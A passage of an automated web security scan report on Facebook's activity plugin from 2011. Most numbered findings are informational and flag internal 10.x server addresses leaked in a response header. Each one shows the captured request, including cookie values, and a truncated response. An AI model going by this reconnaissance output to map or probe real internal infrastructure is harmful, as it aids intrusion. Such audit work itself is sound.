GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.179.40
X-Cnection: close
Date: Thu, 05 May 2011 01:23:41 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.299. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.188.79

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.79
X-Cnection: close
Date: Thu, 05 May 2011 02:12:17 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.300. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.32.251.24

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.251.24
Connection: close
Date: Thu, 05 May 2011 10:57:03 GMT
Content-Length: 7573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.301. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.94.59

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.94.59
X-Cnection: close
Date: Thu, 05 May 2011 01:52:54 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.302. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.193.40

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.193.40
X-Cnection: close
Date: Thu, 05 May 2011 01:26:27 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.303. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.163.33

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.33
X-Cnection: close
Date: Thu, 05 May 2011 11:40:14 GMT
Content-Length: 12011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.304. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.190.43

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.43
X-Cnection: close
Date: Thu, 05 May 2011 01:30:35 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.305. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.91.39

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.91.39
X-Cnection: close
Date: Thu, 05 May 2011 01:01:15 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.306. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.79.83

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.79.83
X-Cnection: close
Date: Thu, 05 May 2011 01:39:00 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.307. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.201.60

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.201.60
X-Cnection: close
Date: Thu, 05 May 2011 01:27:49 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.308. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.148.130

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.148.130
X-Cnection: close
Date: Thu, 05 May 2011 02:02:37 GMT
Content-Length: 11936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.309. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.42.74.47

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.74.47
X-Cnection: close
Date: Thu, 05 May 2011 01:19:37 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.310. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.126.109

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.126.109
X-Cnection: close
Date: Thu, 05 May 2011 01:16:37 GMT
Content-Length: 11987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.311. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.198.64

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.198.64
X-Cnection: close
Date: Thu, 05 May 2011 01:58:25 GMT
Content-Length: 11988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.312. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.36.121.127

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.121.127
X-Cnection: close
Date: Thu, 05 May 2011 01:15:13 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.313. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.136.118

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey